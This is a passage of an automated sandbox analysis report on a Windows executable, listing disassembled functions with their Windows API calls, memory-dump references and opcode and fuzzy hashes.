Instruction Fuzzy Hash: 1A41D37160830DFFEB20DA94CC85EBBB7BCFB50728F50406AF601E6241EA759E419764

Function 0083B59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0083B5AE
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0083B608
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0083B655

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: b5078415951724c37b7757c3a033906c5a5e74c2dfe9a53f0dc2f74e0401a2d3
Instruction ID: c32387cc5bdfe428d3b43fcb19f92d7e9b9e46afeb889f00ef8178c507ab9a6e
Opcode Fuzzy Hash: b5078415951724c37b7757c3a033906c5a5e74c2dfe9a53f0dc2f74e0401a2d3
Instruction Fuzzy Hash: 4721A475A00618EFCB00EF55D884EEDBBB8FF88310F0480AAE905EB351DB35A915CB51

Function 00828CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 007F0FF6: std::exception::exception.LIBCMT ref: 007F102C
Part of subcall function 007F0FF6: __CxxThrowException@8.LIBCMT ref: 007F1041

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00828D0D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00828D3A
GetLastError.KERNEL32 ref: 00828D47

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 9d6873503b4875002155d05594b5b88f40edc6979ac9a6043836956121a9c6c9
Instruction ID: 57525603ade3f1fb9e05eef372d471431caa07a19addab5e6f5992b5819eb4a8
Opcode Fuzzy Hash: 9d6873503b4875002155d05594b5b88f40edc6979ac9a6043836956121a9c6c9
Instruction Fuzzy Hash: 76118FB1514309EFE728AF54EC89D6BB7FCFB44711B24852EF55693682EB34AC408A60

Function 00834C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00834C2C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00834C43
FreeSid.ADVAPI32(?), ref: 00834C53

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 577ab97f084c799b7ad244704c627263ca35ca461b9a4871b0caaac5d5f7e103
Instruction ID: bdb62a57aeeff4cd91cc76fe3b2b4646289bb5db55c47f614b8a3a68cf179ee3
Opcode Fuzzy Hash: 577ab97f084c799b7ad244704c627263ca35ca461b9a4871b0caaac5d5f7e103
Instruction Fuzzy Hash: 3AF0FF7595130DBFDF04DFF4DD89AAEB7BCFF08212F5044A9A601E2182D7756A448B50

Function 007DE060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec7dbbd9992f749621f2ef600ae835f39c0cc0caad6bef2e6fb8ac1891bd7fd6
Instruction ID: f6a48de0b66c633e3242dd455237f5e658dda5c5047477bcdd83160b91b56ef8
Opcode Fuzzy Hash: ec7dbbd9992f749621f2ef600ae835f39c0cc0caad6bef2e6fb8ac1891bd7fd6
Instruction Fuzzy Hash: 0222AE74A0021ADFDB25EF54C884ABEB7F4FF04310F14816AE956AF341E739A985CB91

Function 007D16DE Relevance: 3.1, APIs: 2, Instructions: 83nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623

Part of subcall function 007D25DB: GetWindowLongW.USER32(?,000000EB), ref: 007D25EC

GetParent.USER32(?), ref: 0080BA0A
NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,007D19B3,?,?,?,00000006,?), ref: 0080BA84

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: LongWindow$DialogNtdllParentProc_
String ID:
API String ID: 314495775-0
Opcode ID: ae99337332ff344d56298879060595e194587efec7120087057ed4a49dc0793a
Instruction ID: d059e66a0ed4d85c1b63cb0b52a70984d30df0caa1f937b2cac5f9cfd4e4de08
Opcode Fuzzy Hash: ae99337332ff344d56298879060595e194587efec7120087057ed4a49dc0793a
Instruction Fuzzy Hash: FA216F34201114BFCB209B68CC88DA93BA6FF49374F584256F6259B3F2D7359D529B50

Function 0083C93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0083C966
FindClose.KERNEL32(00000000), ref: 0083C996

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 97356c1a0ea4c8486b14f865f119b90b55548769d25ca850b367bf25fb2af3da
Instruction ID: 509f99358cfc7b23c5db992a842b7568c0fa7f1a88accf8853bfe97549f3887e
Opcode Fuzzy Hash: 97356c1a0ea4c8486b14f865f119b90b55548769d25ca850b367bf25fb2af3da
Instruction Fuzzy Hash: D31165726106149FD710EF29D849A6AF7E9FF84325F01851EF9A5D7391DB34AC00CB81

Function 0085C86D Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623

NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,0080BB8A,?,?,?), ref: 0085C8E1

Part of subcall function 007D25DB: GetWindowLongW.USER32(?,000000EB), ref: 007D25EC

SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0085C8C7

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: LongWindow$DialogMessageNtdllProc_Send
String ID:
API String ID: 1273190321-0
Opcode ID: 87ef92138411c58484d5e63f1b67256665f3348f976f2cc329e9f6895cdde3e1
Instruction ID: 0e4462ec9906a0722325f23e44d9ddc450f2d48af629219ea7b68346b81eb414
Opcode Fuzzy Hash: 87ef92138411c58484d5e63f1b67256665f3348f976f2cc329e9f6895cdde3e1
Instruction Fuzzy Hash: B401B531200304AFCB216F14DC44E663BB6FB85366F180175FD519B2A1C7319816EB91

Function 0085CC2E Relevance: 3.0, APIs: 2, Instructions: 33nativeCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0085CC51
NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,0080BC66,?,?,?,?,?), ref: 0085CC7A

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ClientDialogNtdllProc_Screen
String ID:
API String ID: 3420055661-0
Opcode ID: f408be255c433a06ea1e828f6ac00fe5972c882d6ee30771555e92f1b3ae29c6
Instruction ID: 977a76425fd31c8add76452d5d0e3bbd11d412a22b4dacdef12a079ae343ef17
Opcode Fuzzy Hash: f408be255c433a06ea1e828f6ac00fe5972c882d6ee30771555e92f1b3ae29c6
Instruction Fuzzy Hash: 9FF09A3240021CFFEF048F85DC089BE7BB8FB08312F04006AFA01A2161D3716A60EBA0

Function 0083A2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0084977D,?,0085FB84,?), ref: 0083A302
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0084977D,?,0085FB84,?), ref: 0083A314

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: ba9fc121d56ede401c3e223c44df4dad041e881cd7944a89e958e379160726f6
Instruction ID: 0d4e00a9585f66bbafc83a613e89393d49143c882de6dd45b9372eb141e82b1f
Opcode Fuzzy Hash: ba9fc121d56ede401c3e223c44df4dad041e881cd7944a89e958e379160726f6
Instruction Fuzzy Hash: A3F05E3554532DABEB20AFA48C49FEA776DFF08761F004166B909D6281D6309940CBE1

Function 0085CD6C Relevance: 3.0, APIs: 2, Instructions: 23nativeCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 0085CD74
NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,0080BBE5,?,?,?,?), ref: 0085CDA2

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 7fc6dcd1a70a4f337025ee3fc7e8eeccc3498bd3f974800935a6e192125bea44
Instruction ID: 54c5ea69b6d380b528a9a9d17ad1455cd6d9b0157f3d158d3a17360c9ddf0dad
Opcode Fuzzy Hash: 7fc6dcd1a70a4f337025ee3fc7e8eeccc3498bd3f974800935a6e192125bea44
Instruction Fuzzy Hash: 25E08670100358BFEB155F19DC19FBA3B64FB04752F508225FD56D90E1C7759850DB60

Function 00828713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00828851), ref: 00828728
CloseHandle.KERNEL32(?,?,00828851), ref: 0082873A

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: dba9ae3f70526a488920c9b169ce4efd68c8d74ed34d88876d95b95f6c65d79a
Instruction ID: 326267698b297a3abaa555429029eda9d9c2d08f514b8a2771ee27e81e70d40d
Opcode Fuzzy Hash: dba9ae3f70526a488920c9b169ce4efd68c8d74ed34d88876d95b95f6c65d79a
Instruction Fuzzy Hash: A1E0B676011610EEEB252B61EC09D777BA9FB04351B248829B69680571DB66AC90DB10

Function 007FA395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,00864178,007F8F97,t of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.,?,?,00000001), ref: 007FA39A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 007FA3A3

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8bd4cdf9054d897334b7bfaf306c50972f5c4a3c44ecf7f30fd75f794c9d02a0
Instruction ID: d5150e27d5ccd370fa8ddbafc234acbbb1d62cca04eb856d9c2c2f097f885d44
Opcode Fuzzy Hash: 8bd4cdf9054d897334b7bfaf306c50972f5c4a3c44ecf7f30fd75f794c9d02a0
Instruction Fuzzy Hash: D1B09231054308ABEA002F91ED09BC93F6AFB44AA3F404020F70D84272CB6654508A91

Function 007FF419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4d2c7139ab45998cd357503c9b527787d4fb6c9449f52f0b988989e200feed1
Instruction ID: 8c391e47cfce2fcb2f7d526fc16bdf5da2d3a7218cf9f99af589d50098f5d726
Opcode Fuzzy Hash: f4d2c7139ab45998cd357503c9b527787d4fb6c9449f52f0b988989e200feed1
Instruction Fuzzy Hash: AE321262D69F054DD7239634D832336A249AFB73D8F16E737E819B5AA6EF28C4834140

Function 0080267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0caccf18e9abe59b99afba3dd02ab69150202084fe26d32979a6e0177805a055
Instruction ID: 8f0bb9c65b4f6f2368ae3a64e1953eb2c596f519d677457b40aa9742dc7fbcd5
Opcode Fuzzy Hash: 0caccf18e9abe59b99afba3dd02ab69150202084fe26d32979a6e0177805a055
Instruction Fuzzy Hash: 4DB11220D2AF404DD32396398935332B64CBFBB2D5F52E71BFC1674E62EB6285834541

Function 00838B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00838B25

Part of subcall function 007F543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,008391F8,00000000,?,?,?,?,008393A9,00000000,?), ref: 007F5443
Part of subcall function 007F543A: __aulldiv.LIBCMT ref: 007F5463

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 525b9d2aa7f45b03747776e1aeb8cd10effb830d6a46354a2dbd09edcdee2d2c
Instruction ID: dd8438fc1648f7a08c8092d06eb6a89067ae6e1a1ae6a8ac9d613d01b9ce2861
Opcode Fuzzy Hash: 525b9d2aa7f45b03747776e1aeb8cd10effb830d6a46354a2dbd09edcdee2d2c
Instruction Fuzzy Hash: 2021DF72635610CBC729CF29D841A52B3E1FBA4321F288E6DE1E5CB2D0CA74B905CB94

Function 0085DA9A Relevance: 1.6, APIs: 1, Instructions: 66nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623

NtdllDialogWndProc_W.NTDLL(?,00000112,?,00000000), ref: 0085DB46

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: d88b96b8e7cf35d98a9d2d4c1fdd4432dc91860619a0a9053f20eb643288b1d9
Instruction ID: 1b23d92b9eb4c61c33dc9b49eb53ff0ee7edded6d150d7fb257c04f70acf9fcc
Opcode Fuzzy Hash: d88b96b8e7cf35d98a9d2d4c1fdd4432dc91860619a0a9053f20eb643288b1d9
Instruction Fuzzy Hash: 55110431204325BBEB359E2CCC05FBA3725F741B72F644355FD11DB2D2CA649D189262

Function 0085D6C6 Relevance: 1.5, APIs: 1, Instructions: 47nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 007D25DB: GetWindowLongW.USER32(?,000000EB), ref: 007D25EC

NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,0080BBA2,?,?,?,?,00000000,?), ref: 0085D740

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

